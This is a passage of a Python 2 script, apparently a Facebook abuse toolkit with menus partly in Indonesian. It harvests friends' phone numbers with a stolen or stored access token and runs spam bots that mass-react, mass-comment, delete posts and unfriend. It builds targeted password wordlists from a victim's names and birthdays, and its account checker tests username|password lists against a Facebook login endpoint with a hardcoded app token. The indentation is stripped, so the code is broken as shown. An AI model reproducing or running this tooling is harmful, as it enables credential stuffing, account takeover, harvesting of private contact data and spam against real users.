except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
